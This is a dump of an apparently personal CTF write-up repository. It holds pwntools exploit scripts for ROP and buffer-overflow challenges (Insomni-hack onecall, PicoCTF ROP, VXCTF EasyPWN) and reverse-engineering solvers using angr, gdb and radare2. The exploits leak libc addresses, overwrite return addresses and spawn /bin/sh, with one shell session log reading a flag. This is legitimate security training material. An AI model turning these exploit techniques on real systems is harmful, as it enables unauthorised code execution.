            break

    elf = ELF("lib/libc.so.6")

    #for symbol in sorted(elf.symbols):
    #    print symbol

    sleep = i#elf.symbols["usleep"]
    execve = elf.symbols["execve"]

    if i % 20 == 0:
        print "i = " + hex(i)
    print i
    print hex(i)
    print hex(libcbase)
    r.sendline(p64(i+libcbase))
    r.sendline("ls -al")
    r.interactive()

    rv = r.recvall()
    if "Illegal instruction" in rv or "Segmentation fault" in rv:
        continue
    else:
        print "dla i=" + str(i)
        print rv
        #r.interactive()
--------------------------------------------------------------------------------
/ROP/Insomni-hack teaser 2018 onecall/onecall-efe64fb18c06fbc4ce1c2ae4e7679e14c19ac293d04bdbd13b7d6babe49728b8.tgz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/Insomni-hack teaser 2018 onecall/onecall-efe64fb18c06fbc4ce1c2ae4e7679e14c19ac293d04bdbd13b7d6babe49728b8.tgz
--------------------------------------------------------------------------------
/ROP/Insomni-hack teaser 2018 onecall/readme.md:
--------------------------------------------------------------------------------
# Insomni-hack teaser 2018 onecall

The challenge name says onecall, so obviously it is meant to be done with a one-gadget RCE (????

But since it is ARM, there is no tool that outputs the gadget directly.


No matter, we can brute-force it (????????


Drag libc into IDA, search for "/bin/sh", go into the code, follow the xrefs up to the top, and brute force starting from that group of addresses.

An hour of brute forcing and you get a shell.

```
flag: INS{did_you_gets_here_by_chance?}
```


# Intended Solution

1. https://ntropy-unc.github.io/exploit/pwn/gets/rop/aarch64/arm/magic/gadget/writeup/post/2018/01/21/OneCall.html

2. https://gist.github.com/cosine0/97151015512872a84ac164547410a9e0

--------------------------------------------------------------------------------
/ROP/Insomni-hack teaser 2018 onecall/solve.py:
--------------------------------------------------------------------------------
from pwn import *


host = "onecall.teaser.insomnihack.ch"
port = 1337
#host="localhost"
#port=169
r = remote(host,port)

a=r.recvuntil("\n")
b=r.recvuntil("\n")
c=r.recvuntil("\n")
d=r.recvuntil("\n")
e=r.recvuntil("\n")
f=r.recvuntil("\n")
g=r.recvuntil("\n")
h=r.recvuntil("\n")
i=r.recvuntil("\n")
#ncat -ve ./run.sh -kl 169
delim="r-xp 00000000 ca:01 256115 /home/onecall/chall/lib/libc.so.6"
#delim="r-xp 00000000 08:01 1577167 /root/Desktop/CTF_Game/insomnihack2018/onecall_/lib/libc.so.6"
#0000000051249000 16
libc_base="a"
if delim in a:
    libc_base= "0x"+a[:16]
    print a
if delim in b:
    libc_base= "0x"+b[:16]
    print b
if delim in c:
    libc_base= "0x"+c[:16]
    print c
if delim in d:
    libc_base= "0x"+d[:16]
    print d
if delim in e:
    libc_base= "0x"+e[:16]
    print e
if delim in f:
    libc_base= "0x"+f[:16]
    print f
if delim in g:
    libc_base= "0x"+g[:16]
    print g
if delim in h:
    libc_base= "0x"+h[:16]
    print h
if delim in i:
    libc_base= "0x"+i[:16]
    print i

libc_base=int(libc_base,16)

print "libc_base ="+hex(libc_base)

r.recvuntil("?\n")
pause()
gadget=0x9b958


one=libc_base+gadget

puts=libc_base+0x000000000060D08
sleep=libc_base+0x000000000009AB90
map=0x4006c0
print "onegadget : "+hex(one)
print len(p64(one))

r.sendline(p64(one))


#r.sendline("ls")
r.interactive()


# [+] Opening connection to onecall.teaser.insomnihack.ch on port 1337: Done
# 000000000b4d9000-000000000b607000 r-xp 00000000 ca:01 256115 /home/onecall/chall/lib/libc.so.6

# libc_base =0xb4d9000
# [*] Paused (press any to continue)
# onegadget : 0xb574958
# 8
# [*] Switching to interactive mode
# $ ls
# flag.txt
# lib
# onecall
# qemu-aarch64
# run.sh
# $ cat flag.txt
# INS{did_you_gets_here_by_chance?}
# $

--------------------------------------------------------------------------------
/ROP/PicoCTF_2013_ROP_1_4/rop1-fa6168f4d8eba0eb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/PicoCTF_2013_ROP_1_4/rop1-fa6168f4d8eba0eb
--------------------------------------------------------------------------------
/ROP/PicoCTF_2013_ROP_1_4/rop1/readme.md:
--------------------------------------------------------------------------------
Return to the uncalled function.

Use IDA Pro -> strings view to find the name of the function,

then info functions under GDB.

Write 136 bytes to fill the buffer, 4 to fill the old ebp, then the return address; done.

--------------------------------------------------------------------------------
/ROP/PicoCTF_2013_ROP_1_4/rop1/rop1.py:
--------------------------------------------------------------------------------
from pwn import *

r=process('./rop1')

not_called=0x080484a4

payload='a'*140
payload+=p32(not_called)

print payload

r.sendline(payload)

r.sendline('ls')
r.interactive()
--------------------------------------------------------------------------------
/ROP/PicoCTF_2013_ROP_1_4/rop2-20f65dd0bcbe267d:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/PicoCTF_2013_ROP_1_4/rop2-20f65dd0bcbe267d
--------------------------------------------------------------------------------
/ROP/PicoCTF_2013_ROP_1_4/rop2/readme.md:
--------------------------------------------------------------------------------


```
high
------------------------
| bin/sh               | argument
------------------------
| AAAA                 | calling convention (pass an invalid return address to facilitate a call)
------------------------
| System               | return to function
------------------------
| AAAA                 | overwrite old ebp
------------------------<------ebp
| AAAAAAAAAAAAAAAAAAA  |
------------------------ total 136
| AAAAAAAAAAAAAAAAAAA  |
------------------------
| AAAAAAAAAAAAAAAAAAA  |
------------------------<------esp
low
```


Write from low address to high address.
--------------------------------------------------------------------------------
/ROP/PicoCTF_2013_ROP_1_4/rop2/rop2.py:
--------------------------------------------------------------------------------
from pwn import *
#bin/date=0x804861a
#bin/bash=0x8049611
#0xffffd682 ("bin/bash")
bin_sh=0x8049610 # stack ("bin/sh")
not_called=0x080484a4
#0x08048541 : push edi ; push esi ; push ebx ; call 0x80485bb
#0x08048542 : push esi ; push ebx ; call 0x80485ba

r=process('./rop2')

payload='a'*140

#[padding] + [address of system] + [fake return address] + [addres /bin/bash]


payload+=p32(0x80483a0) + 'aaaa' +p32(0x8049610)

print payload

r.sendline(payload)

r.sendline('ls')
r.interactive()
--------------------------------------------------------------------------------
/ROP/PicoCTF_2013_ROP_1_4/rop3-7f3312fe43c46d26:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/PicoCTF_2013_ROP_1_4/rop3-7f3312fe43c46d26
--------------------------------------------------------------------------------
/ROP/PicoCTF_2013_ROP_1_4/rop3/readme.md:
--------------------------------------------------------------------------------

First, check the strings in IDA Pro: nothing usable.


Then gdb -> crashoff -> A*140 + return address.

We used write to print out the address of a library function,

then used the debugger to check the offset.

Functions in the PLT have fixed addresses at runtime,
so we just call write(1, read, 4).

There is a vulnerable function here, and we set its return address to the call to write in order to leak the address.

By using find /bin/sh <------- search /bin/sh first, then bin/sh

EasyPWN1
>Easiest pwn in the world!
>
>[bof](bof)




This was the sanity-check challenge of this VXCTF.


First, open it in IDA:


```C++

int __cdecl main(int argc, const char **argv, const char **envp)
{
  be_nice_to_people();
  vulnerable_function();
  write(1, "Hello, World\n", 0xDuLL);
  return 0;
}

```

There is a vulnerable_function():

```C++

ssize_t vulnerable_function()
{
  char buf; // [sp+0h] [bp-80h]@1

  return read(0, &buf, 256uLL);
}

```

The read into buf has a buffer overflow.

The function list has a not_called():

```C++

int not_called()
{
  return system("/bin/bash");
}
```

Just point the return address at this function to get a shell.

# Solution:

[solve.py](solve.py)


--------------------------------------------------------------------------------
/ROP/VXCTF 2nd EasyPWN/solve.py:
--------------------------------------------------------------------------------
from pwn import *


host = "124.244.16.209"
port = 8001



r = remote(host,port)

vul=0x400626

payload='A'*136

payload+=p64(vul)


r.sendline(payload)

r.interactive()
--------------------------------------------------------------------------------
/ROP/VXCTF 2nd EasyPWN2/bof2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/VXCTF 2nd EasyPWN2/bof2
--------------------------------------------------------------------------------
/ROP/VXCTF 2nd EasyPWN2/libc.so.6:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/VXCTF 2nd EasyPWN2/libc.so.6
--------------------------------------------------------------------------------
/ROP/VXCTF 2nd EasyPWN2/solve.py:
--------------------------------------------------------------------------------
from pwn import *
import base64
import binascii

host = "124.244.16.209"
port = 8002
#libc = ELF('libc.so.6')
#/lib/x86_64-linux-gnu/libc-2.24.so

libc = ELF('libc-2.24.so')

#r = remote(host,port)

r=process('./bof2')

#sleep(20)

def dump(i):

    r.recvuntil('Input:\n')
    r.sendline('1')

    r.recvuntil(']:\n')

    send=i*-1
    send/=8
    r.sendline(str(send))


    addr=r.recvuntil('\n')[:-1]

    #print addr

    # rebuild the leaked little-endian bytes as a hex string, last byte first
    stri='0x'

    for i in range(len(addr)-1,-1,-1):
        temp=hex(ord(addr[i]))

        #print temp
        checker=int(temp,16)
        offset=''
        if(checker<0x10):
            offset+='0'


        temp=str(temp)

        temp=temp.split('x',1)

        stri+=offset
        stri+=temp[1]

        #print hex(ord(addr[i]))

    #print 'address of position '+str(send)+' '+stri
    dec=int(stri,16)
    hx=hex(dec)

    #print dec

    return hx




write_c=dump(32)

write_c=long(write_c,16)

#.data:0000000000601060 message1
#putchar:0000000000601018 off_601018 -72 putchar
#exit 00601048 -24
#scanf 0000000000601040 -32
#off_601030 dq offset strchr
#write 0000000000601020 -64
#libc main 600FF0 -14

one_time=0x04647c
print write_c

execc=0x0B8A7F


libc_base=write_c-libc.symbols["scanf"]
#exit as main
#sys=0x4006db

sys=libc_base+libc.symbols["system"]

#sys=libc_base+execc

r.recvuntil('Input:\n')
r.sendline('2')
r.recvuntil(']:\n')
r.sendline('-6')
r.recvuntil(']:\n')
r.sendline(p64(sys)[:7])

r.recvuntil('Input:\n')
r.sendline('2')
r.recvuntil(']:\n')
r.sendline('0')
r.recvuntil(']:\n')
payload='/bin/sh\x00'
r.sendline(payload)

#payload='find / -name flag'

#r.sendline(payload)

#payload='cat /home/bof2/flag'

#r.sendline(payload)
r.interactive()
--------------------------------------------------------------------------------
/ROP/readme.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/Reverse/ASIS_2018_babyc/babyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Reverse/ASIS_2018_babyc/babyc
--------------------------------------------------------------------------------
/Reverse/ASIS_2018_babyc/babyc_1a00d836423d314578effc629e58fe3801851df8d9653d5da6a52d4da30ab993:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Reverse/ASIS_2018_babyc/babyc_1a00d836423d314578effc629e58fe3801851df8d9653d5da6a52d4da30ab993
--------------------------------------------------------------------------------
/Reverse/ASIS_2018_babyc/cfg.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Reverse/ASIS_2018_babyc/cfg.png
--------------------------------------------------------------------------------
/Reverse/ASIS_2018_babyc/patched_bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Reverse/ASIS_2018_babyc/patched_bin
--------------------------------------------------------------------------------
/Reverse/ASIS_2018_babyc/solve.py:
-------------------------------------------------------------------------------- 1 | import angr 2 | proj = angr.Project('./patched_bin', auto_load_libs=False) 3 | target=[0x804a6fc] 4 | avoid=[0x804aa08] 5 | st = proj.factory.entry_state() 6 | 7 | for _ in xrange(31): 8 | k = st.posix.files[0].read_from(1) 9 | st.se.add(k != 0) 10 | st.se.add(k != 10) 11 | st.se.add(k>=0x20) 12 | st.se.add(k<=0x7e) 13 | 14 | #constraint last byte as "\n" 15 | k = st.posix.files[0].read_from(1) 16 | st.se.add(k == 10) 17 | 18 | 19 | #constraint size as 27 20 | st.posix.files[0].seek(0) 21 | st.posix.files[0].length = 32 22 | 23 | 24 | pg = proj.factory.path_group(st) 25 | pg.explore(find=target,avoid=avoid) 26 | 27 | print pg.found 28 | #Ah_m0vfu3c4t0r! 0y1ng:(@_ @4@ 29 | print pg.found[0].posix.dumps(0) 30 | #ASIS{574a1ebc69c34903a4631820f292d11fcd41b906} 31 | -------------------------------------------------------------------------------- /Reverse/Bamboofox 2017 little-asm/little-asm-221bc5c8651806d8a039d5ff2a68bc5c7d9e3a20: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Reverse/Bamboofox 2017 little-asm/little-asm-221bc5c8651806d8a039d5ff2a68bc5c7d9e3a20 -------------------------------------------------------------------------------- /Reverse/Bamboofox 2017 little-asm/little-asm-impossible-9d4350fd9310c7bd83a1829825b0fd6491605f4c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Reverse/Bamboofox 2017 little-asm/little-asm-impossible-9d4350fd9310c7bd83a1829825b0fd6491605f4c -------------------------------------------------------------------------------- /Reverse/Bamboofox 2017 little-asm/little-asm-revenge: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Reverse/Bamboofox 2017 little-asm/little-asm-revenge -------------------------------------------------------------------------------- /Reverse/Bamboofox 2017 little-asm/little-asm.py: -------------------------------------------------------------------------------- 1 | #0x555555755020 : 0x939a93939e919d9e 0x8ee883a9ec85a784 2 | #0x555555755030 : 0x98ecec9b83bd8399 0xbdef8e8391e99d83 3 | #0x555555755040 : 0x00000000a1aeb998 0x0000000000000000 4 | 5 | #BAMBOOFOX{Y0u_4RE_a_G00D_A5M_R3aDer} 6 | table=[0x9e,0x9d,0x91,0x9e,0x93,0x93,0x9a,0x93,0x84,0xa7,0x85,0xec,0xa9,0x83,0xe8,0x8e, 7 | 0x99,0x83,0xbd,0x83,0x9b,0xec,0xec,0x98,0x83,0x9d,0xe9,0x91,0x83,0x8e,0xef,0xbd,0x98,0xb9,0xae,0xa1] 8 | 9 | 10 | xorr=0xdc 11 | 12 | print len(table) 13 | flag="" 14 | for i in range(len(table)): 15 | flag+=chr(table[i]^xorr) 16 | 17 | 18 | print flag 19 | -------------------------------------------------------------------------------- /Reverse/Bamboofox 2017 little-asm/little_asm_impossible.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | strr="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_!{}" 4 | flag="BAMBOOFOX{1_f1Nd_A_Lot_0f_juNk_FunCt10n}" 5 | for n in range(43): 6 | tmp=flag 7 | 8 | for i in range(len(strr)): 9 | 10 | t=tmp 11 | t+=strr[i] 12 | r=process("./little-asm-impossible-9d4350fd9310c7bd83a1829825b0fd6491605f4c") 13 | 14 | r.recvuntil(":\n") 15 | r.sendline(t) 16 | print "trying "+t 17 | ans=r.recv(20) 18 | 19 | #print ans 20 | 21 | if "W" in ans: 22 | print "flag : "+t 23 | flag=t 24 | break 25 | 26 | 27 | -------------------------------------------------------------------------------- /Reverse/Bamboofox 2017 little-asm/readme.md: -------------------------------------------------------------------------------- 1 | # Bamboofox 2017 little-asm 2 | 3 | 由於出題人無對input length 做checking 就直接開始validate 
flag, 所以bruteforce 到output 出woow 就可以了 4 | 5 | 6 | # Solution 7 | 8 | 改process名就可以通殺3題 9 | 10 | 11 | [Solve](little_asm_impossible.py) 12 | 13 | -------------------------------------------------------------------------------- /Reverse/CSAW 2017 rev 100 tablez/readme.md: -------------------------------------------------------------------------------- 1 | # CSAW 2017 rev 100 tablez 2 | 3 | # 題目: 4 | 5 | 6 | > tablEZ 7 | >Bobby was talking about tables a bunch, so I made some table stuff. I think this is what he was talking about... 8 | > 9 | >[tablez](tablez) 10 | 11 | 12 | 呢題係今次CTF嘅sanity check, 其實唔難 13 | 14 | IDA Pro main: 15 | 16 | ```C++ 17 | s[strlen(s) - 1] = 0; 18 | v6 = strlen(s); 19 | for ( i = 0LL; i < v6; ++i ) 20 | s[i] = get_tbl_entry((unsigned int)s[i]); 21 | if ( v6 == 37 ) 22 | { 23 | if ( !strncmp(s, s2, 0x26uLL) ) 24 | { 25 | puts("CORRECT <3"); 26 | result = 0; 27 | } 28 | ``` 29 | 題目就係入支flag落去,做transformation, 再同正確嘅flag transformation 對比 30 | 31 | transformation function: 32 | 33 | ```C++ 34 | __int64 __fastcall get_tbl_entry(char a1) 35 | { 36 | unsigned __int64 i; // [sp+Ch] [bp-8h]@1 37 | 38 | for ( i = 0LL; i <= 0xFE; ++i ) 39 | { 40 | if ( a1 == *((_BYTE *)&trans_tbl + 2 * i) ) 41 | return byte_201281[2 * i]; 42 | } 43 | return 0LL; 44 | } 45 | ``` 46 | 47 | 算法好簡單,只要將個byte table dump 出黎 就完成左part 1 48 | 49 | 之後係之前set breakpoint (0x9F7), 抄埋 rcx (正確嘅flag transformation ) 50 | 51 | strncmp assmebly: 52 | 53 | ```asm 54 | .text:00000000000009DE loc_9DE: ; CODE XREF: main+129j 55 | .text:00000000000009DE lea rcx, [rbp+s2] 56 | .text:00000000000009E5 lea rax, [rbp+s] 57 | .text:00000000000009EC mov edx, 26h ; n 58 | .text:00000000000009F1 mov rsi, rcx ; s2 59 | .text:00000000000009F4 mov rdi, rax ; s1 60 | .text:00000000000009F7 call _strncmp 61 | .text:00000000000009FC test eax, eax 62 | .text:00000000000009FE jnz short loc_A13 63 | .text:0000000000000A00 lea rdi, aCorrect3 ; "CORRECT <3" 64 | .text:0000000000000A07 call _puts 65 | 
.text:0000000000000A0C mov eax, 0 66 | .text:0000000000000A11 jmp short loc_A24 67 | ``` 68 | 69 | 有table+result之後,再python implement 1次佢個transfomation algorithm就可以 70 | 71 | 72 | 由於作者唔識打code同睇assembly,所以就求其打左個basic search,再返gdb人手check transformation result 73 | 74 | 75 | ``` 76 | flag:flag{t4ble_l00kups_ar3_b3tter_f0r_m3} 77 | 78 | ``` 79 | -------------------------------------------------------------------------------- /Reverse/CSAW 2017 rev 100 tablez/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | byte_table=[0x0BB,0x2,0x9B,0x3,0x0C4,0x4,0x6C,0x5,0x4A,0x6,0x2E,0x7,0x22, 4 | 0x8,0x45,0x9,0x33,0x0A,0x0B8,0x0B,0x0D5,0x0C,0x6,0x0D,0x0A, 5 | 0x0E,0x0BC,0x0F,0x0FA,0x10,0x79,0x11,0x24,0x12,0x0E1, 6 | 0x13,0x0B2,0x14,0x0BF,0x15,0x2C,0x16,0x0AD,0x17,0x86, 7 | 0x18,0x60,0x19,0x0A4,0x1A,0x0B6,0x1B,0x0D8,0x1C,0x59, 8 | 0x1D,0x87,0x1E,0x41,0x1F,0x94,0x20,0x77,0x21,0x0F0,0x22, 9 | 0x4F,0x23,0x0CB,0x24,0x61,0x2,0x25,0x26,0x0C0,0x27, 10 | 0x97,0x28,0x2A,0x29,0x5C,0x2A,0x8,0x2B,0x0C9,0x2C,0x9F, 11 | 0x2D,0x43,0x2E,0x4E,0x2F,0x0CF,0x30,0x0F9,0x31,0x3E, 12 | 0x32,0x6F,0x33,0x65,0x34,0x0E7,0x35,0x0C5,0x36,0x39, 13 | 0x37,0x0B7,0x38,0x0EF,0x39,0x0D0,0x3A,0x0C8,0x3B,0x2F, 14 | 0x3C,0x0AA,0x3D,0x0C7,0x3E,0x47,0x3F,0x3C,0x40,0x81, 15 | 0x41,0x32,0x42,0x49,0x43,0x0D3,0x44,0x0A6,0x45,0x96, 16 | 0x46,0x2B,0x47,0x58,0x48,0x40,0x49,0x0F1,0x4A,0x9C,0x4B, 17 | 0x0EE,0x4C,0x1A,0x4D,0x5B,0x4E,0x0C6,0x4F,0x0D6,0x50, 18 | 0x80,0x51,0x2D,0x52,0x6D,0x53,0x9A,0x54,0x3D,0x55,0x0A7, 19 | 0x56,0x93,0x57,0x84,0x58,0x0E0,0x59,0x12,0x5A,0x3B,0x5B, 20 | 0x0B9,0x5C,0x9,0x5D,0x69,0x5E,0x0BA,0x5F,0x99,0x60,0x48, 21 | 0x61,0x73,0x62,0x0B1,0x63,0x7C,0x64,0x82,0x65,0x0BE, 22 | 0x66,0x27,0x67,0x9D,0x68,0x0FB,0x69,0x67,0x6A,0x7E,0x6B, 23 | 0x0F4,0x6C,0x0B3,0x6D,0x5,0x6E,0x0C2,0x6F,0x5F,0x70,0x1B, 24 | 0x71,0x54,0x72,0x23,0x73,0x71,0x74,0x11,0x75,0x30,0x76, 25 | 0xD2,0x77,0x0A5,0x78,0x68,0x79,0x9E,0x7A,0x3F,0x7B, 26 | 
0x0F5,0x7C,0x7A,0x7D,0x0CE,0x7E,0x0B,0x7F,0x0C,0x80, 27 | 0x85,0x81,0x0DE,0x82,0x63,0x83,0x5E,0x84,0x8E,0x85,0x0BD, 28 | 0x86,0x0FE,0x87,0x6A,0x88,0x0DA,0x89,0x26,0x8A,0x88, 29 | 0x8B,0x0E8,0x8C,0x0AC,0x8D,0x3,0x8E,0x62,0x8F,0x0A8,0x90, 30 | 0x0F6,0x91,0x0F7,0x92,0x75,0x93,0x6B,0x94,0x0C3,0x95, 31 | 0x46,0x96,0x51,0x97,0x0E6,0x98,0x8F,0x99,0x28,0x9A,0x76, 32 | 0x9B,0x5A,0x9C,0x91,0x9D,0x0EC,0x9E,0x1F,0x9F,0x44,0x0A0, 33 | 0x52,0x0A1,0x1,0x0A2,0x0FC,0x0A3,0x8B,0x0A4,0x3A,0x0A5, 34 | 0x0A1,0x0A6,0x0A3,0x0A7,0x16,0x0A8,0x10,0x0A9,0x14,0x0AA, 35 | 0x50,0x0AB,0x0CA,0x0AC,0x95,0x0AD,0x92,0x0AE,0x4B,0x0AF, 36 | 0x35,0x0B0,0x0E,0x0B1,0x0B5,0x0B2,0x20,0x0B3,0x1D,0x0B4, 37 | 0x5D,0x0B5,0x0C1,0x0B6,0x0E2,0x0B7,0x6E,0x0B8,0x0F,0x0B9, 38 | 0x0ED,0x0BA,0x90,0x0BB,0x0D4,0x0BC,0x0D9,0x0BD,0x42, 39 | 0x0BE,0x0DD,0x0BF,0x98,0x0C0,0x57,0x0C1,0x37,0x0C2,0x19, 40 | 0x0C3,0x78,0x0C4,0x56,0x0C5,0x0AF,0x0C6,0x74,0x0C7,0x0D1, 41 | 0x0C8,0x4,0x0C9,0x29,0x0CA,0x55,0x0CB,0x0E5,0x0CC,0x4C, 42 | 0x0CD,0x0A0,0x0CE,0x0F2,0x0CF,0x89,0x0D0,0x0DB,0x0D1, 43 | 0x0E4,0x0D2,0x38,0x0D3,0x83,0x0D4,0x0EA,0x0D5,0x17,0x0D6, 44 | 0x7,0x0D7,0x0DC,0x0D8,0x8C,0x0D9,0x8A,0x0DA,0x0B4,0x0DB, 45 | 0x7B,0x0DC,0x0E9,0x0DD,0x0FF,0x0DE,0x0EB,0x0DF,0x15, 46 | 0x0E0,0x0D,0x0E1,0x2,0x0E2,0x0A2,0x0E3,0x0F3,0x0E4,0x34, 47 | 0x0E5,0x0CC,0x0E6,0x18,0x0E7,0x0F8,0x0E8,0x13,0x0E9, 48 | 0x8D,0x0EA,0x7F,0x0EB,0x0AE,0x0EC,0x21,0x0ED,0x0E3,0x0EE, 49 | 0x0CD,0x0EF,0x4D,0x0F0,0x70,0x0F1,0x53,0x0F2,0x0FD,0x0F3, 50 | 0x0AB,0x0F4,0x72,0x0F5,0x64,0x0F6,0x1C,0x0F7,0x66,0x0F8, 51 | 0x0A9,0x0F9,0x0B0,0x0FA,0x1E,0x0FB,0x0D7,0x0FC,0x0DF, 52 | 0x0FD,0x36,0x0FE,0x7D,0x0FF] 53 | 54 | output=[39, 179, 115, 157, 245, 17, 231, 177, 55 | 179, 190, 153, 179, 249, 249, 244, 48, 56 | 27, 113, 153, 115, 35, 101, 153, 177, 57 | 101, 17, 17, 190, 35, 153, 39, 249, 58 | 35, 153, 5, 101, 206] 59 | 60 | print 'array size ='+str(len(byte_table)) 61 | 62 | print 'output size ='+str(len(output)) 63 | 64 | #flag{t4ble_l00kups_ar3_b3tter_f0r_m3} 65 | 66 | 67 | for 
i in range(len(output)): 68 | print str(i)+' th: ' 69 | for j in range(len(byte_table)): 70 | 71 | if byte_table[j]==output[i]: 72 | if byte_table[j-1]<126 and byte_table[j-1]>33: 73 | 74 | print chr(byte_table[j-1]) 75 | -------------------------------------------------------------------------------- /Reverse/CSAW 2017 rev 100 tablez/tablez: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Reverse/CSAW 2017 rev 100 tablez/tablez -------------------------------------------------------------------------------- /Reverse/TUCTF_2017_Unknown/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Reverse/TUCTF_2017_Unknown/solve.py: -------------------------------------------------------------------------------- 1 | import gdb 2 | import time 3 | import random 4 | 5 | #elapsed_time :18147.596225500107 6 | #TUCTF{w3lc0m3_70_7uc7f_4nd_7h4nk_y0u_f0r_p4r71c1p471n6!} 7 | 8 | 9 | #p $eflags 10 | #hit [ PF ZF IF ] 11 | #fail [ IF ] 12 | continue_num=0 13 | start_time = time.time() 14 | gdb.execute("set pagination off") 15 | 16 | gdb.execute("b*0x0000000000401c84") 17 | charset_o = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_+*!{}" 18 | listflag = list("T"+'A'*55) #junk 19 | flag="" 20 | for i in range(0,56) : 21 | charset=''.join(random.sample(charset_o,len(charset_o))) 22 | 23 | for j in charset : 24 | listflag[i] = j 25 | gdb.execute('run '+''.join(listflag)) 26 | print("trying: "+j) 27 | 28 | tmp = continue_num 29 | while tmp > 0 : 30 | gdb.execute('c') 31 | tmp = tmp - 1 32 | b00l = gdb.execute('p $eflags',to_string = True) 33 | if len(b00l)>=17: 34 | continue_num+=1 35 | print("################Hit################ "+listflag[i]) 36 | elapsed_time = time.time() - start_time 37 | print("elapsed_time 
:"+str(elapsed_time)) 38 | flag+=listflag[i] 39 | print(flag) 40 | break 41 | else: 42 | continue 43 | 44 | 45 | #print the flag 46 | print(listflag) 47 | -------------------------------------------------------------------------------- /Reverse/UIUCTF_2018_Triptych/solve.py: -------------------------------------------------------------------------------- 1 | import r2pipe 2 | #flag{theres_three_of_em} 3 | def file_stream(c): 4 | fs=open("a.rr2","w") 5 | fs.write("#!/usr/bin/rarun2\n") 6 | fs.write("program=./triptych\n") 7 | fs.write("stdin=\"flag{"+c+"\""+"\n") 8 | fs.write("stdout=") 9 | fs.close() 10 | 11 | def table(c): 12 | file_stream(c) 13 | r2=r2pipe.open("./triptych") 14 | r2.cmd("e dbg.profile=a.rr2") 15 | r2.cmd("ood") 16 | r2.cmd("db 0x00400acd") 17 | r2.cmd("dc") 18 | r2.cmd("db 0x004009d7") 19 | r2.cmd("dc") 20 | r2.cmd("db 0x004008e1") 21 | r2.cmd("dc") 22 | r2.cmd("db 0x004007ce") 23 | r2.cmd("dc")#f 24 | r2.cmd("dc")#l 25 | r2.cmd("dc")#a 26 | r2.cmd("dc")#g 27 | r2.cmd("dc")#{ 28 | r2.cmd("dc") 29 | ret_c=r2.cmd("dr dl") 30 | ret_c=int(ret_c,16) 31 | return ret_c 32 | di={} 33 | for i in range(48,126): 34 | a=table(chr(i)) 35 | di[chr(a)]=chr(i) 36 | 37 | message="zmu}jnd{o{f_ndo{{_hz_{ga" 38 | flag="" 39 | for p in message: 40 | flag+=di[p] 41 | print flag 42 | 43 | print "flag is "+flag 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | #.text:0000000000400ACD call the_second 55 | #r2.cmd("db 0x00400acd") 56 | #r2.cmd("dc") 57 | #2nd 0x004009d7 58 | #3rd 0x004008e1 59 | #4th 0x004007ce 60 | 61 | #dl 62 | -------------------------------------------------------------------------------- /Reverse/UIUCTF_2018_Triptych/triptych: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Reverse/UIUCTF_2018_Triptych/triptych -------------------------------------------------------------------------------- /Tools/SHA2017 asby -PE 
fuzzing/asby.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Tools/SHA2017 asby -PE fuzzing/asby.exe -------------------------------------------------------------------------------- /Tools/SHA2017 asby -PE fuzzing/asby.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | 3 | def getp(): 4 | p=subprocess.Popen(['asby.exe'],stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE) 5 | return p 6 | 7 | def tryflag(p, possible_flag): 8 | command = possible_flag + '\r\n' 9 | p.stdin.write(command) 10 | for i in range(len(possible_flag)): 11 | response=p.stdout.readline() 12 | if 'WRONG!' in response: 13 | return False 14 | return True 15 | 16 | p = getp() 17 | assert(tryflag(p, 'flag{')) 18 | assert(tryflag(p, 'flag{0')) 19 | 20 | flag = 'flag{' 21 | 22 | for x in range(32): 23 | 24 | for y in range(16): 25 | 26 | c = '%x' % y 27 | if tryflag(p,flag+c): 28 | print(flag) 29 | flag+=str(c) 30 | break 31 | 32 | 33 | 34 | flag += '}' 35 | 